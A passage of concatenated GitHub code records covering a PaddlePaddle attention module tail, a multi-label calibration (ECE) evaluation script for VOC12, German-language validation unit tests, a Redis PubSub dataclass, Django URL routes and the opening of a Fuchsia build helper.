tensor.matmul(weights, v)\n\n # combine heads\n out = tensor.transpose(out, perm=[0, 2, 1, 3])\n out = tensor.reshape(x=out, shape=[0, 0, out.shape[2] * out.shape[3]])\n\n # project to output\n out = self.out_proj(out)\n\n outs = 
[out]\n if self.need_weights:\n outs.append(weights)\n if cache is not None:\n outs.append(cache)\n return out if len(outs) == 1 else tuple(outs)\n\ndef _convert_attention_mask(attn_mask, dtype):\n if attn_mask is not None and attn_mask.dtype != dtype:\n attn_mask_dtype = convert_dtype(attn_mask.dtype)\n if attn_mask_dtype == 'bool' or 'int' in attn_mask_dtype:\n attn_mask = (paddle.cast(attn_mask, dtype) - 1.0) * 1e9\n else:\n attn_mask = paddle.cast(attn_mask, dtype)\n return attn_mask\n","repo_name":"PaddlePaddle/PASSL","sub_path":"passl_v110/modeling/backbones/base_transformer.py","file_name":"base_transformer.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"48"} +{"seq_id":"31622930937","text":"from copy import deepcopy\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport warnings\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn import metrics\nfrom tqdm import tqdm\nimport argparse\nfrom mmcv import Config, DictAction\nimport os.path\n\nimport cv2\nimport mmcv\nimport numpy as np\nimport pandas as pd\nimport torch\n\nfrom dywsss.tool import pyutils, imutils\nimport dywsss.tool.data\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom torch.backends import cudnn\nfrom dywsss.tool.torch_utils import *\nimport timm\nfrom ml_metric import Accuracy, F1Measure, F1Measure_sklearn, ECE_loss\ncudnn.enabled = True\n\ncategories = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\ndef average_performance(pred, target, thr=None, k=None):\n \"\"\"Calculate CP, CR, CF1, OP, OR, OF1, where C stands for per-class\n average, O stands for overall average, P stands for precision, R stands for\n recall and F1 stands for F1-score.\n Args:\n pred (torch.Tensor | np.ndarray): The model prediction with shape\n (N, C), where C is the number of classes.\n target (torch.Tensor | np.ndarray): The target of each prediction with\n shape (N, C), where C is the number of classes. 1 stands for\n positive examples, 0 stands for negative examples and -1 stands for\n difficult examples.\n thr (float): The confidence threshold. Defaults to None.\n k (int): Top-k performance. Note that if thr and k are both given, k\n will be ignored. 
Defaults to None.\n Returns:\n tuple: (CP, CR, CF1, OP, OR, OF1)\n \"\"\"\n if isinstance(pred, torch.Tensor) and isinstance(target, torch.Tensor):\n pred = pred.detach().cpu().numpy()\n target = target.detach().cpu().numpy()\n elif not (isinstance(pred, np.ndarray) and isinstance(target, np.ndarray)):\n raise TypeError('pred and target should both be torch.Tensor or'\n 'np.ndarray')\n if thr is None and k is None:\n thr = 0.5\n warnings.warn('Neither thr nor k is given, set thr as 0.5 by '\n 'default.')\n elif thr is not None and k is not None:\n warnings.warn('Both thr and k are given, use threshold in favor of '\n 'top-k.')\n\n assert pred.shape == \\\n target.shape, 'pred and target should be in the same shape.'\n\n eps = np.finfo(np.float32).eps\n target[target == -1] = 0\n if thr is not None:\n # a label is predicted positive if the confidence is no lower than thr\n pos_inds = pred >= thr\n\n else:\n # top-k labels will be predicted positive for any example\n sort_inds = np.argsort(-pred, axis=1)\n sort_inds_ = sort_inds[:, :k]\n inds = np.indices(sort_inds_.shape)\n pos_inds = np.zeros_like(pred)\n pos_inds[inds[0], sort_inds_] = 1\n\n tp = (pos_inds * target) == 1\n fp = (pos_inds * (1 - target)) == 1\n fn = ((1 - pos_inds) * target) == 1\n\n precision_class = tp.sum(axis=0) / np.maximum(\n tp.sum(axis=0) + fp.sum(axis=0), eps)\n recall_class = tp.sum(axis=0) / np.maximum(\n tp.sum(axis=0) + fn.sum(axis=0), eps)\n CP = precision_class.mean() * 100.0\n CR = recall_class.mean() * 100.0\n CF1 = 2 * CP * CR / np.maximum(CP + CR, eps)\n OP = tp.sum() / np.maximum(tp.sum() + fp.sum(), eps) * 100.0\n OR = tp.sum() / np.maximum(tp.sum() + fn.sum(), eps) * 100.0\n OF1 = 2 * OP * OR / np.maximum(OP + OR, eps)\n return CP, CR, CF1, OP, OR, OF1\n\n\ndef average_precision(pred, target):\n r\"\"\"Calculate the average precision for a single class.\n AP summarizes a precision-recall curve as the weighted mean of maximum\n precisions obtained for any r'>r, where r is the recall:\n .. math::\n \\text{AP} = \\sum_n (R_n - R_{n-1}) P_n\n Note that no approximation is involved since the curve is piecewise\n constant.\n Args:\n pred (np.ndarray): The model prediction with shape (N, ).\n target (np.ndarray): The target of each prediction with shape (N, ).\n Returns:\n float: a single float as average precision value.\n \"\"\"\n eps = np.finfo(np.float32).eps\n\n # sort examples\n sort_inds = np.argsort(-pred)\n sort_target = target[sort_inds]\n\n # count true positive examples\n pos_inds = sort_target == 1\n tp = np.cumsum(pos_inds)\n total_pos = tp[-1]\n\n # count not difficult examples\n pn_inds = sort_target != -1\n pn = np.cumsum(pn_inds)\n\n tp[np.logical_not(pos_inds)] = 0\n precision = tp / np.maximum(pn, eps)\n ap = np.sum(precision) / np.maximum(total_pos, eps)\n return ap\n\n# from mmcls\n\n\ndef mAP(pred, target):\n \"\"\"Calculate the mean average precision with respect of classes.\n Args:\n pred (torch.Tensor | np.ndarray): The model prediction with shape\n (N, C), where C is the number of classes.\n target (torch.Tensor | np.ndarray): The target of each prediction with\n shape (N, C), where C is the number of classes. 
1 stands for\n positive examples, 0 stands for negative examples and -1 stands for\n difficult examples.\n Returns:\n float: A single float as mAP value.\n \"\"\"\n if isinstance(pred, torch.Tensor) and isinstance(target, torch.Tensor):\n pred = pred.detach().cpu().numpy()\n target = target.detach().cpu().numpy()\n elif not (isinstance(pred, np.ndarray) and isinstance(target, np.ndarray)):\n raise TypeError('pred and target should both be torch.Tensor or'\n 'np.ndarray')\n\n assert pred.shape == \\\n target.shape, 'pred and target should be in the same shape.'\n num_classes = pred.shape[1]\n ap = np.zeros(num_classes)\n # exist_classes = range(num_classes)\n\n label_exist = np.where(pred > 0.5, 1, 0).sum(0) + target.sum(0)\n\n # exist_classes = np.argwhere(label_exist > 0)[0]\n exist_classes = (label_exist > 0).nonzero()[0].tolist()\n # print(f'num_exist_classes is {len(exist_classes)}, exist_classes is {exist_classes}')\n\n # exist_classes = pass\n\n for k in exist_classes:\n ap[k] = average_precision(pred[:, k], target[:, k])\n mean_ap = ap.mean() * 100.\n return mean_ap\n\n\ndef Average_Precision(pred, target):\n N = len(target)\n for i in range(N):\n if max(target[i]) == 0 or min(target[i]) == 1:\n pass\n precision = 0\n for i in range(N):\n index = np.where(target[i] == 1)[0]\n score = pred[i][index]\n score = sorted(score)\n score_all = sorted(pred[i])\n precision_tmp = 0\n for item in score:\n tmp1 = score.index(item)\n tmp1 = len(score) - tmp1\n tmp2 = score_all.index(item)\n tmp2 = len(score_all) - tmp2\n precision_tmp += tmp1 / tmp2\n precision += precision_tmp / len(score)\n Average_Precision = precision / N\n return Average_Precision\n\n\ndef mean_avg_precision(pred, target):\n meanAP = metrics.average_precision_score(\n target, pred, average='macro', pos_label=1)\n return meanAP\n\n\nclass Normalize():\n def __init__(self, mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):\n self.mean = mean\n self.std = std\n\n def __call__(self, img):\n imgarr = np.asarray(img)\n proc_img = np.empty_like(imgarr, np.float32)\n\n proc_img[..., 0] = (imgarr[..., 0] / 255. - self.mean[0]) / self.std[0]\n proc_img[..., 1] = (imgarr[..., 1] / 255. - self.mean[1]) / self.std[1]\n proc_img[..., 2] = (imgarr[..., 2] / 255. - self.mean[2]) / self.std[2]\n\n return proc_img\n\n\ndef analyse_bin_10(prediction_batch, labels_batch):\n debug = 1\n for idx in range(labels_batch.shape[0]):\n y = np.argsort(prediction_batch[idx])[-1]\n x = np.sort(prediction_batch[idx])[-1]\n label = (labels_batch[idx] == 1).nonzero(as_tuple=True)[0]\n\n\n# Multi-label ECE\ndef compute_Conf_ECE(args, dir_score, num_bin, metric_func, note):\n df_score = pd.read_csv(dir_score)\n\n # sort by confidence\n df_score.sort_values(by=['confidence'], inplace=True)\n conf_score = df_score['confidence'].to_list()\n\n prediction_all = torch.randn(0)\n labels_all = torch.randn(0)\n\n perfermance_bins = []\n count_bins = []\n images_list_bins = []\n\n # mAP_function = mean_avg_precision\n\n # mAP_function = Average_Precision\n\n model = timm.create_model(args.network, pretrained=True, num_classes=20)\n model.load_state_dict(torch.load(args.weights))\n print(f'Loading weights from {args.weights}')\n print('\\nvalidating ... 
', flush=True, end='')\n\n # devide miou_score to num_bin bins\n each_bin = 1/num_bin\n for bin in tqdm(range(num_bin)):\n\n bin_lower = bin * each_bin\n bin_upper = (bin + 1) * each_bin\n # find the name_images in bin\n idx_in_bin = (np.array(conf_score) <= bin_upper) * \\\n (np.array(conf_score) >= bin_lower)\n img_name_list_in_bin = np.array(\n df_score['name_image'].tolist())[idx_in_bin]\n mIoU_in_bin = np.array(df_score['confidence'].tolist())[idx_in_bin]\n\n images_list_bins.append(img_name_list_in_bin)\n count_bins.append(len(img_name_list_in_bin))\n\n # print(f'In [{bin_lower, bin_upper}] bin have {len(img_name_list_in_bin)} samples')\n normalize = Normalize()\n val_dataset = dywsss.tool.data.VOC12ClsDataset(\n img_name_list_path='',\n img_name_list=img_name_list_in_bin,\n voc12_root=args.voc12_root,\n transform=transforms.Compose([\n np.asarray,\n normalize,\n imutils.CenterCrop(args.crop_size),\n imutils.HWC_to_CHW,\n torch.from_numpy,\n ])\n )\n\n val_data_loader = DataLoader(\n val_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False\n )\n\n model.eval()\n model = model.cuda()\n\n valid_dict = {}\n count = 0\n\n prediction_batch = torch.randn(0)\n labels_batch = torch.randn(0)\n\n with torch.no_grad():\n for pack in val_data_loader:\n names = pack[0]\n imgs = pack[1].cuda(non_blocking=True)\n labels = pack[2].cuda(non_blocking=True)\n x = model(imgs)\n prediction = torch.sigmoid(x)\n prediction_batch = torch.cat(\n (prediction_batch, prediction.cpu()), 0)\n labels_batch = torch.cat((labels_batch, labels.cpu()), 0)\n\n # visualization\n case_idx = 4\n try:\n case_show(args, names[case_idx], img=imgs[case_idx], label=labels[case_idx], prediction=prediction[case_idx],\n mIoU=mIoU_in_bin[case_idx], bin=bin,\n dir_save=f'Fig/fig_ECE/{args.session_name}/case_show_batch_{case_idx}')\n except Exception as e:\n print(f'case show error! {e}')\n\n prediction_all = torch.cat((prediction_all, prediction_batch.cpu()), 0)\n labels_all = torch.cat((labels_all, labels_batch.cpu()), 0)\n\n # perfermance_bin = metric_func(pred=prediction_batch, target=labels_batch)\n try:\n # compute mAP pred, target\n perfermance_bin = metric_func(\n pred=prediction_batch, target=labels_batch)\n except:\n perfermance_bin = 0\n perfermance_bins.append(perfermance_bin)\n\n perfermance_overall = metric_func(pred=deepcopy(\n prediction_all), target=deepcopy(labels_all))\n ML_ECE = ECE_loss(pred=deepcopy(prediction_all), target=deepcopy(\n labels_all), num_bin=num_bin, network=args.fignote, save_path=f'Fig/fig_ECE/{args.session_name}')\n\n return perfermance_bins, count_bins, images_list_bins, perfermance_overall, ML_ECE\n\n\ndef compute_CAM_ECE(args, dir_score, num_bin):\n df_score = pd.read_csv(dir_score)\n df_score.sort_values(by=['miou'], inplace=True)\n miou_score = df_score['miou'].to_list()\n\n prediction_all = torch.randn(0)\n labels_all = torch.randn(0)\n\n mAP_bins = []\n count_bins = []\n images_list_bins = []\n\n # mAP_function = mean_avg_precision\n mAP_function = mAP\n # mAP_function = Average_Precision\n\n model = timm.create_model(args.network, pretrained=True, num_classes=20)\n model.load_state_dict(torch.load(args.weights))\n print(f'Loading weights from {args.weights}')\n print('\\nvalidating ... 
', flush=True, end='')\n\n each_bin = 1/num_bin\n for bin in range(num_bin):\n\n bin_lower = bin * each_bin\n bin_upper = (bin + 1) * each_bin\n\n idx_in_bin = (np.array(miou_score) <= bin_upper) * \\\n (np.array(miou_score) >= bin_lower)\n img_name_list_in_bin = np.array(\n df_score['name_image'].tolist())[idx_in_bin]\n mIoU_in_bin = np.array(df_score['miou'].tolist())[idx_in_bin]\n\n images_list_bins.append(img_name_list_in_bin)\n count_bins.append(len(img_name_list_in_bin))\n\n normalize = Normalize()\n val_dataset = dywsss.tool.data.VOC12ClsDataset(\n img_name_list_path='',\n img_name_list=img_name_list_in_bin,\n voc12_root=args.voc12_root,\n transform=transforms.Compose([\n np.asarray,\n normalize,\n imutils.CenterCrop(args.crop_size),\n imutils.HWC_to_CHW,\n torch.from_numpy,\n ])\n )\n\n val_data_loader = DataLoader(\n val_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False\n )\n\n model.eval()\n model = model.cuda()\n\n valid_dict = {}\n count = 0\n\n prediction_batch = torch.randn(0)\n labels_batch = torch.randn(0)\n\n with torch.no_grad():\n for pack in val_data_loader:\n names = pack[0]\n imgs = pack[1].cuda(non_blocking=True)\n labels = pack[2].cuda(non_blocking=True)\n x = model(imgs)\n prediction = torch.sigmoid(x)\n prediction_batch = torch.cat(\n (prediction_batch, prediction.cpu()), 0)\n labels_batch = torch.cat((labels_batch, labels.cpu()), 0)\n\n prediction_all = torch.cat((prediction_all, prediction_batch.cpu()), 0)\n labels_all = torch.cat((labels_all, labels_batch.cpu()), 0)\n\n try:\n mAP_bin = mAP_function(pred=prediction_batch, target=labels_batch)\n except:\n mAP_bin = 0\n mAP_bins.append(mAP_bin)\n\n mAP_overall = mAP_function(pred=prediction_all, target=labels_all)\n\n return mAP_bins, count_bins, images_list_bins, mAP_overall\n\n\ndef draw_plot_CAM(mAP_bins, count_bins, network, note):\n # count_bins = [count / 1449 * 100 for count in count_bins]\n num_bin = len(mAP_bins)\n # bins = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n bins = np.linspace(start=0, stop=1-1/num_bin, num=num_bin).tolist()\n bins_hundred = np.linspace(start=0, stop=(\n 1 - 1 / num_bin) * 100, num=num_bin).tolist()\n\n # plt.bar(bins, mAP_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n # plt.bar(bins, bins_hundred, width=1 / num_bin, color='#FA7F6F', edgecolor='black', label='GAP')\n plt.bar(bins, mAP_bins, width=1 / num_bin,\n color='#82B0D2', edgecolor='black', label='mIoU')\n\n plt.title(f'{note} per bin {network}')\n plt.xlabel('CAM')\n plt.ylabel(f'{note} of the Multi-label Classification')\n plt.legend()\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_{note}.png')\n # plt.show()\n plt.clf()\n\n # plt.bar(bins, count_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n plt.bar(bins, count_bins, width=1 / num_bin,\n color='#FA7F6F', edgecolor='black', label='Count')\n plt.title(f'count per bin {network}')\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_confidence_count.png')\n # plt.show()\n\n\ndef draw_plot_confidence(mAP_bins, count_bins, network, note):\n # count_bins = [count / 1449 * 100 for count in count_bins]\n num_bin = len(mAP_bins)\n # bins = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n bins = np.linspace(start=0, stop=1-1/num_bin, num=num_bin).tolist()\n bins_hundred = np.linspace(start=0, stop=(\n 1 - 1 / num_bin) * 100, num=num_bin).tolist()\n\n # plt.bar(bins, mAP_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n # plt.bar(bins, 
bins_hundred, width=1 / num_bin, color='#FA7F6F', edgecolor='black', label='GAP')\n plt.bar(bins, mAP_bins, width=1 / num_bin,\n color='#82B0D2', edgecolor='black', label='mIoU')\n\n plt.title(f'{note} per bin {network}')\n plt.xlabel('confidence')\n plt.ylabel(f'{note} of the Multi-label Classification')\n plt.legend()\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_{note}.png')\n # plt.show()\n plt.clf()\n\n # plt.bar(bins, count_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n plt.bar(bins, count_bins, width=1 / num_bin,\n color='#FA7F6F', edgecolor='black', label='Count')\n plt.title(f'count per bin {network}')\n \n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_confidence_count.png')\n # plt.show()\n\n\ndef cam2mask(cam):\n h, w = list(cam.values())[0].shape\n tensor = np.zeros((21, h, w), np.float32)\n for key in cam.keys():\n tensor[key + 1] = cam[key]\n tensor[0, :, :] = 0.1\n mask = np.argmax(tensor, axis=0).astype(np.uint8)\n return mask\n\n\ndef compute_mIoU(prediction, gt):\n pass\n\n\ndef putpalette(mask):\n colormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],\n [128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0],\n [192, 0, 0], [64, 128, 0], [192, 128, 0], [64, 0, 128],\n [192, 0, 128], [64, 128, 128], [192, 128, 128], [0, 64, 0],\n [128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]\n\n r = mask.copy()\n g = mask.copy()\n b = mask.copy()\n\n for cls in range(21):\n r[mask == cls] = colormap[cls][0]\n g[mask == cls] = colormap[cls][1]\n b[mask == cls] = colormap[cls][2]\n\n # b[mask == cls] = self.colormap[color_cls][2]\n\n rgb = np.zeros((mask.shape[0], mask.shape[1], 3))\n rgb[:, :, 0] = b\n rgb[:, :, 1] = g\n rgb[:, :, 2] = r\n\n return rgb.astype('uint8')\n\n\ndef concat_two_img(img1, img2):\n image = np.hstack((img1, img2))\n return image\n\n\ndef case_show(args, name, img, label, prediction, mIoU, bin, dir_save):\n dir_img = os.path.join(args.voc12_root, args.img_dir, name+'.jpg')\n dir_cam = os.path.join(args.out_cam, name+'.npy')\n args.gt_dir = gt_dir = \"voc12/VOC2012/SegmentationClassAug\"\n dir_gt = os.path.join(args.gt_dir, name+'.png')\n\n img = mmcv.imread(dir_img)\n cam = np.load(dir_cam, allow_pickle=True).item()\n gt = mmcv.imread(dir_gt, flag='grayscale')\n\n cam_mask = cam2mask(cam)\n # mIou = compute_mIoU(cam_mask, gt)\n cam_mask = putpalette(cam_mask)\n gt = putpalette(gt)\n\n vis_cam = cv2.addWeighted(img, 0.4, cam_mask, 0.6, gamma=0.1)\n vis_gt = cv2.addWeighted(img, 0.4, gt, 0.6, gamma=0.1)\n vis = concat_two_img(vis_cam, vis_gt)\n\n vis = mmcv.imresize(vis.copy(), (2048, 1024))\n\n # prediction, label, mIoU\n label = np.argwhere(label.cpu())[0].tolist()\n prediction_classes = np.argwhere(prediction.cpu() > 0.5)[0].tolist()\n label = [categories[item] for item in label]\n\n prediction_classes = [categories[item] for item in prediction_classes]\n prediction_confidence = prediction[prediction > 0.5].mean().item()\n\n if np.isnan(prediction_confidence):\n prediction_confidence = prediction.max().item()\n # sample_accuracy = (prediction > 0.5).sum() + label\n # sample_loss = 0\n\n text_mIoU = f\"JS score = {round(mIoU * 100, 2)}%\"\n text_Confidence = f\"ML-Confidence = {round(prediction_confidence * 100, 2)}%\"\n text_label = f\"label = {label}\"\n text_prediction = f\"prediction = {prediction_classes}\"\n\n cv2.rectangle(vis, (1200, 0), (2048, 0 + 200), (255, 255, 255), -1)\n\n cv2.putText(vis, text_mIoU, (1225, 25),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, 
text_Confidence, (1225, 75),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, text_label, (1225, 125),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, text_prediction, (1225, 175),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n\n if not os.path.exists(dir_save):\n os.makedirs(dir_save)\n mmcv.imwrite(vis, os.path.join(dir_save, f'{bin}.png'))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a models')\n parser.add_argument('config', help='train config file path')\n parser.add_argument('--csv', type=str)\n parser.add_argument('--work-dir', help='the dir to save logs and models')\n parser.add_argument(\n '--resume-from', help='the checkpoint file to resume from')\n parser.add_argument('--tag', help='the tag')\n parser.add_argument(\n '--no-validate',\n action='store_true',\n help='whether not to evaluate the checkpoint during training')\n group_gpus = parser.add_mutually_exclusive_group()\n group_gpus.add_argument('--device', help='device used for training')\n group_gpus.add_argument(\n '--gpus',\n type=int,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n group_gpus.add_argument(\n '--gpu-ids',\n type=int,\n nargs='+',\n help='ids of gpus to use '\n '(only applicable to non-distributed training)')\n parser.add_argument('--seed', type=int, default=None, help='random seed')\n parser.add_argument(\n '--deterministic',\n action='store_true',\n help='whether to set deterministic options for CUDNN backend.')\n parser.add_argument(\n '--options', nargs='+', action=DictAction, help='arguments in dict')\n args = parser.parse_args()\n\n return args\n\n\ndef writedict(file, dictionary):\n s = ''\n for key in dictionary.keys():\n sub = '%s:%s ' % (key, dictionary[key])\n s += sub\n s += '\\n'\n file.write(s)\n\n\ndef writelog(filepath, metric, comment):\n filepath = filepath\n logfile = open(filepath, 'a')\n import time\n logfile.write(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n logfile.write('\\t%s\\n' % comment)\n writedict(logfile, metric)\n logfile.write('=====================================\\n')\n logfile.close()\n\n\nif __name__ == '__main__':\n args = parse_args()\n cfg = Config.fromfile(args.config)\n if args.options is not None:\n cfg.merge_from_dict(args.options)\n args = cfg\n\n args.model_dir = os.path.join('work_dirs', args.session_name, \"model\")\n args.weights = os.path.join(args.model_dir, args.weights)\n args.test_dir = os.path.join('work_dirs', args.session_name, \"test\")\n args.out_cam = os.path.join(args.test_dir,\n f'cam_{args.eval_list.split(\"/\")[-1].split(\".\")[0]}_{args.weights.split(\"/\")[-1].split(\".\")[0]}')\n \n if os.path.exists(f'Fig/fig_ECE/{args.session_name}') == False:\n os.makedirs(f'Fig/fig_ECE/{args.session_name}')\n \n dir_score = f'miou_loss_csv/miou_loss_{args.session_name}_{args.weights.split(\"/\")[-1].split(\".\")[0]}_{args.eval_list.split(\"/\")[-1].split(\".\")[0]}.csv'\n\n Accuracy_bins, Accuracy_count_bins, _, Accuracy_overall, ML_ECE = compute_Conf_ECE(\n args, dir_score, num_bin=20, metric_func=Accuracy, note='Accuracy')\n draw_plot_confidence(Accuracy_bins, Accuracy_count_bins, args.fignote, note='Accuracy')\n print(f'{args.session_name} Accuracy_overall is {Accuracy_overall}')\n print(f'{args.session_name} ML_ECE is 
{ML_ECE}')","repo_name":"Muyun99/VICE","sub_path":"compute_ECE.py","file_name":"compute_ECE.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14110987963","text":"import unittest\nimport src.pyvalidations as PyValidation\n\n\nclass TestRequiredDe(unittest.TestCase):\n\n def test_pyvalidation_is_required(self):\n data = {\n \"name_1\": \"Majid\",\n \"name_2\": \"\",\n \"name_3\": None,\n }\n rules = {\n \"name_1\": [\"required\"],\n \"name_2\": [\"required\"],\n \"name_3\": [\"required\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'name_2': ['Das Feld name_2 ist erforderlich.'],\n 'name_3': ['Das Feld name_3 ist erforderlich.']},\n 'failed': True})\n\n def test_required_if_passed(self):\n data = {\n \"first_name\": \"\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"33\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_if:first_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_if_failed(self):\n data = {\n \"first_name\": \"Majid\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_if:first_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {\n 'errors':\n {'age':\n ['Das Feld age ist erforderlich, wenn first_name vorhanden ist.',\n 'Das age muss eine Zahl sein.'],\n 'last_name': ['Das last_name darf nur Buchstaben enthalten.']},\n 'failed': True})\n\n def test_required_unless_passed(self):\n data = {\n \"email\": \"example@email.com\",\n \"phone\": \"s123456\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"required_unless:email\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_unless_failed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"s123456\",\n \"name\": \"\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"required_unless:email\", \"numeric\"],\n \"name\": [\"required_unless:email\", \"alpyha\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'name': ['Das Feld name ist erforderlich, es sei denn, email ist '\n 'nicht vorhanden oder leer.'],\n 'phone': ['Das phone muss eine Zahl sein.']},\n 'failed': True})\n\n def test_required_with_passed(self):\n data = {\n \"first_name\": \"\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"33\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_with:first_name,last_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_with_failed(self):\n data = {\n \"first_name\": \"Majid\",\n \"last_name\": \"Ahmaditabar\",\n \"age\": \"\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"nullable\", \"alpha\"],\n \"age\": [\"required_with:first_name,last_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n 
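# age is blank while first_name and last_name are filled in, so the required_with rule must report an error\n 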
self.assertEqual(validate, {\n 'errors': {'age': ['Das Feld age ist erforderlich, wenn first_name,last_name vorhanden ist/sind.',\n 'Das age muss eine Zahl sein.']},\n 'failed': True})\n\n def test_required_without_passed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"\",\n \"user_name\": \"MajAhd\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"nullable\", \"numeric\"],\n \"user_name\": [\"required_without:email,phone\", \"string\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_without_failed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"\",\n \"user_name\": \"\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"nullable\", \"numeric\"],\n \"user_name\": [\"required_without:email,phone\", \"string\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'user_name': ['Das Feld user_name ist erforderlich, wenn '\n 'email,phone nicht vorhanden ist/sind.']},\n 'failed': True})\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MajAhd/py_validations","sub_path":"tests/test_required_de.py","file_name":"test_required_de.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25682450612","text":"import json\nfrom typing import Optional, Union\n\nfrom dataclasses import dataclass, field\n\n@dataclass\nclass PubSubMessage:\n \"\"\"\n Just a container for handling a message as it comes fresh off of\n Redis pubsub\n \"\"\"\n type: str\n pattern: Optional[str]\n channel: bytes\n data: Union[bytes, int]\n payload: Optional[dict] = field(init=False)\n\n def __post_init__(self):\n if self.is_message:\n self.payload = json.loads(self.data)\n else:\n self.payload = self.data\n\n @property\n def is_message(self):\n \"\"\"\n This refers to Redis PubSub message type, not the Chat message\n event type\n \"\"\"\n return self.type == \"message\" or self.type == \"pmessage\"\n","repo_name":"hciudad/yaca","sub_path":"chat/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33279355072","text":"# pages/urls.py\nfrom django.urls import path\nfrom .views import homePageView,MarkersMapView,MapView,CesiumView,MapPluemView\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\napp_name = \"markers\"\n\nurlpatterns = [\n path(\"\", homePageView, name=\"home\"),\n path(\"map/\", MapView, name=\"test\"),\n path(\"cesium/\", CesiumView, name=\"cesium\"),\n path(\"mapPluem/\", MapPluemView, name=\"mapall\"),\n]\n\nurlpatterns += staticfiles_urlpatterns() ","repo_name":"Apizz789/GISTDA_INTERNSHIP","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35669212865","text":"import argparse\nimport os\nimport subprocess\nimport sys\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nFUCHSIA_ROOT = os.path.dirname( # $root\n os.path.dirname( # scripts\n SCRIPT_DIR)) # unification\n\n\nclass Finder(object):\n\n def __init__(self, gn_binary, zircon_dir, build_dir):\n 